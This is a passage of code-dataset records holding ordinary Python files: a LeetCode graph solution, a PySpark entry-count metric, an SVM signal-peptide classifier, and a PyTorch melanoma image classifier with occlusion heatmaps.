= set()\n            nodes_queue = deque([(origin_node, 0)])\n            distances = Counter()\n\n            while len(nodes_queue) > 0:\n                node, distance = nodes_queue.popleft()\n                distances[node] = distance\n\n                if node not in visited:\n                    visited.add(node)\n                    destination_nodes = [\n                        destination_node\n                        for destination_node in reachable[node]\n                        if destination_node not in visited\n                    ]\n                    nodes_queue.extend(\n                        (destination_node, distance + 1)\n                        for destination_node in destination_nodes\n                    )\n\n            return distances\n\n        distances_1 = bfs(origin_node=node1)\n        distances_2 = bfs(origin_node=node2)\n        common_nodes_with_difference = [\n            (max(distances_1[node], distances_2[node]), node)\n            for node in distances_1.keys()\n            if node in distances_2\n        ]\n        if len(common_nodes_with_difference) > 0:\n            common_nodes_with_difference = sorted(common_nodes_with_difference)\n            return common_nodes_with_difference[0][1]\n\n        return -1\n\n\nif __name__ == '__main__':\n    solution = Solution()\n    # print(\n    #     solution.closestMeetingNode(\n    #         edges=[2, 2, 3, -1],\n    #         node1=0,\n    #         node2=1,\n    #     )\n    # )\n    # print(\n    #     solution.closestMeetingNode(\n    #         edges=[1, 2, -1],\n    #         node1=0,\n    #         node2=2,\n    #     )\n    # )\n    # print(\n    #     solution.closestMeetingNode(\n    #         edges=[4, 3, 0, 5, 3, -1],\n    #         node1=4,\n    #         node2=0,\n    #     )\n    # )\n    print(\n        solution.closestMeetingNode(\n            edges=[4, 4, 8, -1, 9, 8, 4, 4, 1, 1],\n            node1=5,\n            node2=6,\n        )\n    )\n", "repo_name": "thanhnguyen2187/random-problem-solving", "sub_path": "leetcode/n2359_find_closest_node_to_given_two_nodes.py", "file_name": "n2359_find_closest_node_to_given_two_nodes.py", "file_ext": "py", "file_size_in_byte": 2757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 37, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 38, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 46, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "13159831289", "text": "from lib.metrics import Metric\r\nfrom pyspark.sql.functions import col\r\n\r\n\r\nclass CountEntries(Metric):\r\n\t\"\"\"Count the number of records of the entities person, publication and organization\"\"\"\r\n\r\n\tdef calc(self, dataFrames, spark):\r\n\t\treturn {\r\n\t\t\t\"persons\": dataFrames[\"persons\"].count(),\r\n\t\t\t\"affiliations\": dataFrames[\"persons\"].where(col(\"affiliations.orgID\").isNotNull()).count(),\r\n\t\t\t\"works\": dataFrames[\"works\"].count(),\r\n\t\t\t\"orgUnits\": dataFrames[\"orgUnits\"].count()\r\n\t\t}\r\n", "repo_name": "Stefan-Wolff/dqm-pipeline", "sub_path": "tasks/entry_count.py", "file_name": "entry_count.py", "file_ext": "py", "file_size_in_byte": 480, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "lib.metrics.Metric", "line_number": 5, "usage_type": "name"}, {"api_name": "pyspark.sql.functions.col", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "30345133015", "text": "#detection of SPs using SVMs\n\ndef get_data(f):\n    '''function that takes as input a file, reads it and returns the corresponding pandas dataframe'''\n    with open (f, 'r') as seq_df:\n        return pd.read_csv(f, sep='\\t', header=0) #opening the tsv file containing the seqs\n\ndef get_sets_by_class(seq_df, num_fold):\n    '''function that takes as input the seqs df, divides it into testing and training sets based on their cross-validation fold number and returns them'''\n    test_set = 
seq_df[seq_df['Cross-validation fold'] == num_fold][['Class', 'Sequence (first 50 N-terminal residues)']]\n    train_set = seq_df[seq_df['Cross-validation fold'] != num_fold][['Class', 'Sequence (first 50 N-terminal residues)']]\n    return (test_set, train_set)\n\ndef get_all_combinations(parameters):\n    '''function that creates all possible combinations of the k, C and gamma values from the input lists. returns a list containing all these combos stored as tuples'''\n    return [combination for combination in itertools.product(*parameters)] #list of tuples\n\ndef create_matrix_x(seqs_ls, k, aa_order):\n    '''function that takes as input a list of seqs, slices them to length k and creates the corresponding 2D 20-dimensional composition vectors'''\n    #taking as input the list containing all seqs in train_set and slicing them according to the k input value defined\n    seqs_sliced = [seq[:k] for seq in seqs_ls]\n\n    #creating the matrix_x \n    matrix_x = []\n    for seq in seqs_sliced:\n        seq_comp = []\n        for res in aa_order:\n            seq_comp.append(seq.count(res) / len(seq))\n        matrix_x.append(seq_comp)\n    return matrix_x\n\ndef create_binary_vect(seq_df):\n    '''function that takes as input a dataset and returns a list containing the Class values replaced by binary values, ie 1: SP, 0: NO_SP'''\n    return list(seq_df['Class'].replace(to_replace = ['SP', 'NO_SP'], value = [1, 0])) #binary vector as a list of 1 and 0 values \n\ndef create_svc_model(matrix_x, vect_y, C_value, gamma_value):\n    '''function that takes as input the matrix X and the vector Y, builds an SVM model on it and trains it'''\n    svc = svm.SVC(C=C_value, kernel='rbf', gamma=gamma_value) #creating an SVC \n    return svc.fit(matrix_x, vect_y) #returns the fitted svc \n\ndef find_opt_combination(mccs, combinations):\n    '''returns the optimal combination of parameters k, C, gamma associated with the max MCC value found'''\n    max_mcc = max(mccs)\n    max_index = mccs.index(max_mcc) #finding the best MCC and its associated index in the list\n    for comb_index in range(len(combinations)):\n        if comb_index == max_index:\n            return (max_mcc, max_index, combinations[max_index])\n\ndef get_classification(bench_df, true, pred):\n    '''function that adds a feature in the bench df which records, for each protein, whether it is a TP, TN, FP or FN as found in the confusion matrix'''\n    class_order = []\n    for true_value, pred_value in zip(true, pred):\n        if true_value == pred_value == 1:\n            class_order.append('TP')\n        elif true_value == pred_value == 0:\n            class_order.append('TN')\n        elif true_value == 0 and pred_value == 1:\n            class_order.append('FP')\n        else:\n            class_order.append('FN')\n    bench_df = bench_df.assign(Classification=class_order)\n    bench_df.to_csv('benchmark_set_svm_class.tsv', index=False, sep='\\t')\n    return ('The SVM classification TSV file of the benchmark entries has been produced.')\n\ndef get_metrics(true, pred):\n    '''function that returns accuracy, F1 score, MCC, precision and recall'''\n    accuracy = accuracy_score(true, pred)\n    f_score = f1_score(true, pred)\n    mcc = matthews_corrcoef(true, pred)\n    precision = precision_score(true, pred)\n    recall = recall_score(true, pred)\n    return accuracy, f_score, mcc, precision, recall\n\ndef get_se(values_ls, num_class):\n    '''returns the standard error'''\n    return np.std(values_ls) / sqrt(num_class)\n\nif __name__ == \"__main__\":\n    import itertools\n    import numpy as np\n    import pandas as pd\n    import sys\n    from math import sqrt\n    from sklearn import svm\n    from sklearn.metrics import accuracy_score, confusion_matrix, f1_score, matthews_corrcoef, precision_score, 
recall_score\n    from statistics import mean\n\n    train_df = get_data(sys.argv[1])\n    bench_df = get_data(sys.argv[2])\n\n    aa_order = 'AQLSREKTNGMWDHFYCIPV' #the 20 standard amino acid residues\n    num_class = 5\n    parameters = [[20, 22, 24], [1, 2, 4], [0.5, 1, 'scale']]\n    accuracies, f_scores, mccs, precisions, recalls, thrs = [], [], [], [], [], []\n    testing_tn, testing_fp, testing_fn, testing_tp = 0, 0, 0, 0\n    \n    combinations = get_all_combinations(parameters) #list of tuples with all possible combinations\n    for combination in combinations: #combination[0]: k, combination[1]: C, combination[2]: gamma\n        fold_mccs = [] #list that stores the 5 possible MCCs, one per cross-validation fold\n        #print('Combination', combination, ':')\n        for num_fold in range(num_class):\n            test_set, train_set = get_sets_by_class(train_df, num_fold) #dividing the training dataset according to the fold-cross number\n            test_set_matrix, train_set_matrix = create_matrix_x(list(test_set['Sequence (first 50 N-terminal residues)']), combination[0], aa_order), create_matrix_x(list(train_set['Sequence (first 50 N-terminal residues)']), combination[0], aa_order)\n            test_set_vect, train_set_vect = create_binary_vect(test_set), create_binary_vect(train_set) #test_set_vect contains the real class of each entry\n            svc = create_svc_model(train_set_matrix, train_set_vect, combination[1], combination[2]) #training the svc with the training set\n            test_set_pred = svc.predict(test_set_matrix) #testing the svc on the testing set\n            accuracy, f_score, single_mcc, precision, recall = get_metrics(test_set_vect, test_set_pred)\n            accuracies.append(accuracy), f_scores.append(f_score), fold_mccs.append(single_mcc), precisions.append(precision), recalls.append(recall)\n            accuracy_se, fscore_se, fold_mcc_se, precision_se, recall_se = get_se(accuracies, num_class), get_se(f_scores, num_class), get_se(fold_mccs, num_class), get_se(precisions, num_class), get_se(recalls, num_class)\n            testing_conf_matrix = confusion_matrix(test_set_vect, test_set_pred)\n            tn, fp, fn, tp = confusion_matrix(test_set_vect, test_set_pred).ravel()\n            #print('Testing set', num_fold, 'confusion matrix:', '\\n', testing_conf_matrix)\n            #print('TN:', tn, 'FP:', fp, 'FN:', fn, 'TP:', tp)\n        mccs.append(mean(fold_mccs)) #computing the avg of the 5 fold MCCs for each combination\n    mccs_se = get_se(mccs, num_class)\n    max_mcc, max_index, opt_combination = find_opt_combination(mccs, combinations) #finding the best combination among the 27 possible ones (the one with the highest MCC)\n    print('27 combinations MCC:', mccs)\n    print('Maximum MCC:', max_mcc, '| Approximation: %.2f' %max_mcc)\n    print('Associated index of the maximum MCC:', max_index)\n    print('Optimal k-C-gamma combination:', opt_combination)\n    print('Average accuracy:', mean(accuracies), '| Approximation: %.2f' %mean(accuracies))\n    print('Average F-score:', mean(f_scores), '| Approximation: %.2f' %mean(f_scores))\n    print('Average precision:', mean(precisions), '| Approximation: %.2f' %mean(precisions))\n    print('Average recall:', mean(recalls), '| Approximation: %.2f' %mean(recalls))\n    print()\n    print('Accuracy standard error:', accuracy_se, '| Approximation: %.2f' %accuracy_se)\n    print('F1 score standard error:', fscore_se, '| Approximation: %.2f' %fscore_se)\n    print('MCC standard error:', mccs_se, '| Approximation: %.2f' %mccs_se)\n    print('Precision standard error:', precision_se, '| Approximation: %.2f' %precision_se)\n    print('Recall standard error:', recall_se, '| Approximation: %.2f' %recall_se)\n    print()\n\n    train_matrix, bench_matrix = 
create_matrix_x(list(train_df['Sequence (first 50 N-terminal residues)']), opt_combination[0], aa_order), create_matrix_x(list(bench_df['Sequence (first 50 N-terminal residues)']), opt_combination[0], aa_order)\n    train_vect, bench_vect = create_binary_vect(train_df), create_binary_vect(bench_df)\n    svc = svm.SVC(C=opt_combination[1], kernel='rbf', gamma=opt_combination[2])\n    svc.fit(train_matrix, train_vect)\n    bench_pred = svc.predict(bench_matrix)\n    bench_conf_matrix = confusion_matrix(bench_vect, bench_pred) \n    tn, fp, fn, tp = confusion_matrix(bench_vect, bench_pred).ravel()\n    accuracy, f_score, mcc, precision, recall = get_metrics(bench_vect, bench_pred)\n    print('Accuracy:', accuracy, '| Approximation: %.2f' %accuracy)\n    print('F-score:', f_score, '| Approximation: %.2f' %f_score)\n    print('MCC:', mcc, '| Approximation: %.2f' %mcc)\n    print('Precision:', precision, '| Approximation: %.2f' %precision)\n    print('Recall:', recall, '| Approximation: %.2f' %recall)\n    print('Benchmark Set confusion matrix:', '\\n', bench_conf_matrix)\n    print('TN:', tn, 'FP:', fp, 'FN:', fn, 'TP:', tp)\n    print(get_classification(bench_df, bench_vect, bench_pred))\n\n", "repo_name": "violavuong/bioinfo", "sub_path": "lb2/svm.py", "file_name": "svm.py", "file_ext": "py", "file_size_in_byte": 9120, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.argv", "line_number": 88, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 89, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 110, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 111, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 114, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 121, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 122, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 123, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 135, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 135, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 138, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "4496578688", "text": "from __future__ import division\nfrom __future__ import print_function\nimport copy\nimport math\nimport os\nimport pickle\nimport random\nimport time\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom PIL import Image\nfrom PIL import ImageFile\nfrom torch.autograd import Variable\nfrom torchvision import datasets, models, transforms\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\nnorm_mean = [0.485, 0.456, 0.406]\nnorm_std = [0.229, 0.224, 0.225]\n\n\ndef get_norm():\n    return norm_mean, norm_std\n\n\nDATA = '/data/isic/analysed/'\nINVALID_CACHE = False\n# Detect if we have a GPU available\nis_cuda = torch.cuda.is_available()\nassert is_cuda\ndevice = torch.device(\"cuda:1\")\n\n\ndef np_to_tensor(X, type=torch.FloatTensor, requires_grad=False):\n    v = Variable(torch.from_numpy(X), requires_grad=requires_grad).type(type)\n    if is_cuda: v = v.cuda()\n    return v\n\n\ndef cache_run(f, cache_file=None, cache=True, args=None):\n    \"\"\"\n    Wrap another function to cache the return value\n    Probably better to use np.save for large np 
arrays\n \"\"\"\n argstring = None\n # if args is not None:\n # argstring = '.'.join([str(k)+'.'+str(v) for k,v in args.items()])\n if cache_file is None:\n cache_file = f.__name__\n if argstring is not None: cache_file += '.' + argstring\n cache_file += '.pkl'\n\n v = None\n cache_file = DATA + cache_file\n if (not INVALID_CACHE) and cache and os.path.exists(cache_file):\n # print('loading cache...',cache_file)\n v = pickle.load(open(cache_file, 'rb'))\n else:\n print('cache_run calculating...')\n if args is not None:\n v = f(args)\n else:\n v = f()\n\n pickle.dump(v, open(cache_file, 'wb'))\n\n assert len(v) > 0\n return v\n\n\n# https://pytorch.org/tutorials/beginner/finetuning_torchvision_models_tutorial.html\n\nBASE = './isic/'\ndata_dir = BASE + 'dataset-classify'\n# model_dir = '/data/isic/analysed/classify/' # to train with magnus model\nmodel_dir = BASE + 'analysed/classify/' # to train with CA retrained jitter\n# Models to choose from [resnet, alexnet, vgg, squeezenet, densenet, inception]\nnum_classes = 2\nbatch_size = 8\nnum_epochs = 30 # was 15\nmodel_name = 'inception' # CA\n# model_name = 'vgg'\n# Flag for feature extracting. When False, we finetune the whole model,\n# when True we only update the reshaped layer params\nfeature_extract = False\n\n\ndef create_image_folder():\n import os, json\n from shutil import copyfile\n classes = ['melanoma', 'nevus']\n files = {c: [] for c in classes}\n\n in_desc = BASE + 'descriptions/'\n in_img = BASE + 'images/'\n out_dir = BASE + 'dataset-classify/'\n train_frac = 0.8\n\n for filename in os.listdir(in_desc):\n if filename[0] == '.': continue\n data = json.load(open(in_desc + filename))\n if 'diagnosis' in data['meta']['clinical']:\n diag = data['meta']['clinical']['diagnosis']\n else:\n diag = None\n src = in_img + filename + '.jpeg'\n if diag in classes and os.path.exists(src):\n files[diag].append(filename)\n\n for c in classes:\n random.shuffle(files[c])\n n_train = int(train_frac * float(len(files[c])))\n\n for phase in ['train', 'val']:\n if not os.path.exists(out_dir + phase): os.mkdir(out_dir + phase)\n if not os.path.exists(out_dir + phase + '/' + c): os.mkdir(out_dir + phase + '/' + c)\n\n if phase == 'train':\n v = files[c][:n_train]\n elif phase == 'val':\n v = files[c][n_train:]\n\n for filename in v:\n print(filename, c, phase)\n dest = out_dir + phase + '/' + c + '/' + filename + '.jpeg'\n if not os.path.exists(dest):\n copyfile(in_img + filename + '.jpeg', dest)\n\n\ndef set_parameter_requires_grad(model, feature_extracting):\n if feature_extracting:\n for param in model.parameters():\n param.requires_grad = False\n\n\ndef initialize_model(model_name, num_classes, feature_extract, use_pretrained=True, load=False):\n # Initialize these variables which will be set in this if statement. 
Each of the\n    # variables is model specific.\n    model_ft = None\n    input_size = 0\n    assert not feature_extract\n    if load: use_pretrained = False\n\n    if model_name == \"resnet\":\n        \"\"\" Resnet18\n        \"\"\"\n        assert False\n        model_ft = models.resnet18(pretrained=use_pretrained)\n        set_parameter_requires_grad(model_ft, feature_extract)\n        num_ftrs = model_ft.fc.in_features\n        model_ft.fc = nn.Linear(num_ftrs, num_classes)\n        input_size = 224\n\n    elif model_name == \"alexnet\":\n        \"\"\" Alexnet\n        \"\"\"\n        assert False\n        model_ft = models.alexnet(pretrained=use_pretrained)\n        set_parameter_requires_grad(model_ft, feature_extract)\n        num_ftrs = model_ft.classifier[6].in_features\n        model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n        input_size = 224\n\n    elif model_name == \"vgg\":\n        \"\"\" VGG11_bn\n        \"\"\"\n        # model_ft = models.vgg11_bn(pretrained=use_pretrained)\n        model_ft = models.vgg19(pretrained=use_pretrained)\n        set_parameter_requires_grad(model_ft, feature_extract)\n        num_ftrs = model_ft.classifier[6].in_features\n        model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n        input_size = 224\n\n    elif model_name == \"squeezenet\":\n        \"\"\" Squeezenet\n        \"\"\"\n        assert False\n        model_ft = models.squeezenet1_0(pretrained=use_pretrained)\n        set_parameter_requires_grad(model_ft, feature_extract)\n        model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1, 1), stride=(1, 1))\n        model_ft.num_classes = num_classes\n        input_size = 224\n\n    elif model_name == \"densenet\":\n        \"\"\" Densenet\n        \"\"\"\n        assert False\n        model_ft = models.densenet121(pretrained=use_pretrained)\n        set_parameter_requires_grad(model_ft, feature_extract)\n        num_ftrs = model_ft.classifier.in_features\n        model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n        input_size = 224\n\n    elif model_name == \"inception\":\n        \"\"\" Inception v3\n        Be careful, expects (299,299) sized images and has auxiliary output\n        \"\"\"\n        model_ft = models.inception_v3(pretrained=use_pretrained)\n        set_parameter_requires_grad(model_ft, feature_extract)\n        # Handle the auxiliary net\n        num_ftrs = model_ft.AuxLogits.fc.in_features\n        model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\n        # Handle the primary net\n        num_ftrs = model_ft.fc.in_features\n        model_ft.fc = nn.Linear(num_ftrs, num_classes)\n        input_size = 299\n\n    else:\n        print(\"Invalid model name, exiting...\")\n        exit()\n\n    if load:\n        filename = model_dir + model_name + '.pth'\n        assert os.path.exists(filename)\n        print('loading model', filename)\n        model_ft.load_state_dict(torch.load(filename))\n\n    return model_ft, input_size\n\n\ndef train_model(model, dataloaders, criterion, optimizer, num_epochs=25, is_inception=False):\n    since = time.time()\n\n    val_acc_history = []\n\n    best_model_wts = copy.deepcopy(model.state_dict())\n    best_acc = 0.0\n    i = 0\n\n    for epoch in range(num_epochs):\n        print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n        print('-' * 10)\n\n        # Each epoch has a training and validation phase\n        for phase in ['train', 'val']:\n            if phase == 'train':\n                model.train()  # Set model to training mode\n            else:\n                model.eval()  # Set model to evaluate mode\n\n            running_loss = 0.0\n            running_corrects = 0\n\n            # Iterate over data.\n            for inputs, labels in dataloaders[phase]:\n                inputs = inputs.to(device)\n                labels = labels.to(device)\n\n                # zero the parameter gradients\n                optimizer.zero_grad()\n\n                # forward\n                # track history only if in train\n                with torch.set_grad_enabled(phase == 'train'):\n                    # Get model outputs and calculate loss\n                    # Special case for inception because in training it has an auxiliary output. 
In train\n                    # mode we calculate the loss by summing the final output and the auxiliary output\n                    # but in testing we only consider the final output.\n                    if is_inception and phase == 'train':\n                        # From https://discuss.pytorch.org/t/how-to-optimize-inception-model-with-auxiliary-classifiers/7958\n                        outputs, aux_outputs = model(inputs)\n                        loss1 = criterion(outputs, labels)\n                        loss2 = criterion(aux_outputs, labels)\n                        loss = loss1 + 0.4 * loss2\n                    else:\n                        outputs = model(inputs)\n                        loss = criterion(outputs, labels)\n\n                    _, preds = torch.max(outputs, 1)\n\n                    # backward + optimize only if in training phase\n                    if phase == 'train':\n                        loss.backward()\n                        optimizer.step()\n\n                # statistics\n                running_loss += loss.item() * inputs.size(0)\n                running_corrects += torch.sum(preds == labels.data)\n\n            epoch_loss = running_loss / len(dataloaders[phase].dataset)\n            epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)\n\n            print('{} Loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss, epoch_acc))\n\n            # deep copy the model\n            if phase == 'val' and epoch_acc > best_acc:\n                best_acc = epoch_acc\n                best_model_wts = copy.deepcopy(model.state_dict())\n\n                filename = model_dir + model_name + '.pth'\n                print('saving', filename)\n                torch.save(model.state_dict(), filename)\n\n            if phase == 'val':\n                val_acc_history.append(epoch_acc)\n\n        print()\n\n    time_elapsed = time.time() - since\n    print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))\n    print('Best val Acc: {:4f}'.format(best_acc))\n\n    # load best model weights\n    model.load_state_dict(best_model_wts)\n    return model, val_acc_history\n\n\ndef create_dataloaders(input_size, batch_size=batch_size, only_val_transforms=False):\n    data_transforms = {\n        'train': transforms.Compose([\n            transforms.RandomResizedCrop(input_size),\n            transforms.RandomHorizontalFlip(),\n            transforms.RandomVerticalFlip(),  # magnus added\n            transforms.RandomRotation(180),  # magnus added\n            transforms.ColorJitter(hue=0.4),  # callum added for the second round of training with hue changes\n            transforms.ToTensor(),\n            # transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n            transforms.Normalize(norm_mean, norm_std)\n        ]),\n        'val': transforms.Compose([\n            transforms.Resize(input_size),\n            transforms.CenterCrop(input_size),\n            transforms.ToTensor(),\n            # transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n            transforms.Normalize(norm_mean, norm_std)\n        ]),\n    }\n    if only_val_transforms: data_transforms['train'] = data_transforms['val']\n\n    # Create training and validation datasets\n    # image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'val']}\n    image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'val']}\n    # Create training and validation dataloaders\n    dataloaders_dict = {\n        x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle=True, num_workers=4) for x in\n        ['train', 'val']}\n    return dataloaders_dict\n\n\ndef run_training(load=True, save=True):\n    # Initialize the model for this run\n    model_ft, input_size = initialize_model(model_name, num_classes, feature_extract, use_pretrained=True, load=load)\n\n    # Data augmentation and normalization for training # Just normalization for validation\n\n    # Create training and validation datasets\n    # image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'val']}\n    # Create training and validation dataloaders\n    # dataloaders_dict = {x: 
torch.utils.data.DataLoader(image_datasets[x], batch_size= batch_size, shuffle=True, num_workers=4) for x in ['train', 'val']}\n    dataloaders_dict = create_dataloaders(input_size)\n\n    # to find label -> index: image_datasets['train'].class_to_idx\n    # 0 = melanoma, 1 = nevus\n\n    # Send the model to GPU\n    model_ft = model_ft.to(device)\n\n    # Gather the parameters to be optimized/updated in this run. If we are\n    # finetuning we will be updating all parameters. However, if we are\n    # doing feature extract method, we will only update the parameters\n    # that we have just initialized, i.e. the parameters with requires_grad\n    # is True.\n    params_to_update = model_ft.parameters()\n    # print(\"Params to learn:\")\n    if feature_extract:\n        params_to_update = []\n        for name, param in model_ft.named_parameters():\n            if param.requires_grad:\n                params_to_update.append(param)\n                # print(\"\\t\",name)\n    else:\n        for name, param in model_ft.named_parameters():\n            if param.requires_grad:\n                pass\n                # print(\"\\t\",name)\n\n    # Observe that all parameters are being optimized\n    optimizer_ft = optim.SGD(params_to_update, lr=0.001, momentum=0.9)\n\n    # Setup the loss fxn\n    criterion = nn.CrossEntropyLoss()\n\n    # Train and evaluate\n    model_ft, hist = train_model(model_ft, dataloaders_dict, criterion, optimizer_ft, num_epochs=num_epochs,\n                                 is_inception=(model_name == \"inception\"))\n\n\n# ===============================================================================\n\n# def image_loader(image_name,input_size):\n# \"\"\"\n# Load image and apply normalization as required for feeding to network\n# \"\"\"\n# loader = transforms.Compose([\n#\ttransforms.Resize(input_size),\n#\ttransforms.CenterCrop(input_size),\n#\ttransforms.ToTensor(),\n#\ttransforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n#\t])\n# image = Image.open(image_name)\n# image = loader(image).float()\n# image = Variable(image, requires_grad=True)\n##image = image.unsqueeze(0) #this is for VGG, may not be needed for ResNet\n# return image.cuda() #assumes that you're using GPU\n#\n#\n# def display_image_loader(image_name,input_size):\n# \"\"\"\n# Load image and crop - to make figures, no other normalization\n# \"\"\"\n# loader = transforms.Compose([\n#\ttransforms.Resize(input_size),\n#\ttransforms.CenterCrop(input_size),\n#\t])\n# image = Image.open(image_name)\n# image = loader(image)\n# return image\n\ndef create_masks(img_size, mask_size, step):\n    img_size = int(img_size)\n    n_masks = int(math.ceil(img_size / step) ** 2)\n    masks = np.ones((n_masks, 3, img_size, img_size))\n    mask_dims = []\n\n    i = 0\n    for y1 in range(0, img_size, step):\n        for x1 in range(0, img_size, step):\n            x2 = min(x1 + mask_size, img_size)\n            y2 = min(y1 + mask_size, img_size)\n            # print(x1,y1,x2,y2)\n            masks[i, :, x1:x2, y1:y2] = 0\n            mask_dims.append((x1, x2, y1, y2))\n            i += 1\n\n    # a = Image.fromarray(masks[15,1,:,:]*255)\n    # a.show()\n    return masks, mask_dims\n\n\ndef analyse_model():\n    \"\"\"\n    Run the trained inception model on all of the validation images and save results\n    \"\"\"\n    import common\n    out = open('/data/isic/analysed/inception_results.csv', 'w')\n    model_ft, img_size = initialize_model('inception', num_classes=2, feature_extract=False, use_pretrained=False,\n                                          load=True)\n    model_ft.cuda()\n    model_ft.eval()\n    paths = [('/data/isic/dataset-classify/val/nevus/', 'nevus'),\n             ('/data/isic/dataset-classify/val/melanoma/', 'melanoma')]\n\n    correct = 0.0\n    incorrect = 0.0\n\n    for path in paths:\n        for filename in os.listdir(path[0]):\n            img = common.image_loader(path[0] + 
filename, img_size)\n            img = img.repeat(1, 1, 1, 1)\n            X = torch.softmax(model_ft(img), 1)\n            X = X.detach().cpu().numpy()[0][0]\n            if X >= 0.5 and path[1] == 'melanoma':\n                correct += 1\n            elif X < 0.5 and path[1] == 'nevus':\n                correct += 1\n            else:\n                incorrect += 1\n            v = [filename, path[1], X, correct / (correct + incorrect)]\n            v = [str(a) for a in v]\n            print(v)\n            out.write(','.join(v) + '\\n')\n\n\ndef analyse_image_mask(model_ft, img_size, path, filename, modes=['heatmap', 'best']):\n    \"\"\"\n    Occlude areas of the image using tiled masks and assess which are most important for classification\n    Save the region that causes the most differentiation\n    \"\"\"\n    max_batch = 50\n    # filename = '/data/isic/dataset-classify/val/melanoma/ISIC_0009934.jpeg'\n    # filename = '/data/isic/dataset-classify/val/melanoma/ISIC_0000284.jpeg'\n    # filename = '/data/isic/dataset-classify/val/melanoma/ISIC_0029740.jpeg'\n    out_dir = '/data/isic/analysed/heatmap/'\n    out_dir2 = '/data/isic/analysed/topdisc/'\n    if not os.path.exists(out_dir): os.mkdir(out_dir)\n    if not os.path.exists(out_dir2): os.mkdir(out_dir2)\n\n    # model_ft, img_size = initialize_model('inception', num_classes=2, feature_extract=False, use_pretrained=False,load=True)\n    # model_ft.cuda()\n    # model_ft.eval()\n\n    def f1():\n        mask_size = int(img_size / 5)\n        step = int(mask_size / 4)\n        masks, mask_dims = create_masks(img_size, mask_size, step)\n        masks = np_to_tensor(masks)\n        n_masks = masks.shape[0]\n        results = np.zeros(n_masks)\n\n        for start in range(0, n_masks, max_batch):\n            batch_size = min(max_batch, n_masks - start)\n            current_masks = masks[start:start + batch_size, :, :, :]\n            img = image_loader(path + filename, img_size)\n            img = img.repeat(batch_size, 1, 1, 1)\n            img = img * current_masks\n            X = torch.softmax(model_ft(img), 1)\n            X = X.detach().cpu().numpy()\n            results[start:start + batch_size] = X[:, 1]\n            # print(X.shape,current_masks.shape)\n\n        return results, masks.cpu().numpy(), mask_dims\n\n    results, masks, mask_dims = cache_run(f1, cache=False)\n    img_size = masks.shape[2]\n    #\n    heat_map = np.zeros((img_size, img_size))\n    total = np.zeros((img_size, img_size))\n\n    for i, x in enumerate(results):\n        inverse_mask = np.logical_not(masks[i, 0, :, :].copy())\n        heat_map += x * inverse_mask\n        total += inverse_mask\n\n    input_img = display_image_loader(path + filename, img_size)\n    input_array = np.asarray(input_img).copy()\n    out_file = filename.split('.')[0]\n\n    # save the top discriminative region\n    if 'best' in modes:\n        best = np.argmax(results)\n        x1, x2, y1, y2 = mask_dims[best]\n        best_img = Image.fromarray(input_array[x1:x2, y1:y2])\n        best_img.save(out_dir2 + out_file + '.jpg')\n\n    # save the heatmap\n    if 'heatmap' in modes:\n        heat_map = heat_map / total\n        # input_img = display_image_loader(path+filename,img_size)\n        input_img.save(out_dir + out_file + '_img.jpg')\n        import pylab as pl\n        # input_img = np.asarray(input_img).copy()\n        pl.pcolor(heat_map, cmap='jet')\n        pl.axis('off')\n        pl.gca().set_aspect('equal', adjustable='box')\n        pl.savefig(out_dir + out_file + '_heatmap.jpg')\n\n\ndef all_analyse_image_mask():\n    path = '/data/isic/dataset-classify/val/melanoma/'\n    model_ft, img_size = initialize_model('inception', num_classes=2, feature_extract=False, use_pretrained=False,\n                                          load=True)\n    model_ft.cuda()\n    model_ft.eval()\n\n    for filename in os.listdir(path):\n        if not filename.endswith('jpeg'): continue\n        print(path, filename)\n        analyse_image_mask(model_ft, img_size, path, filename, modes=['best'])\n\n\nif __name__ == \"__main__\":\n    run_training()\n", "repo_name": 
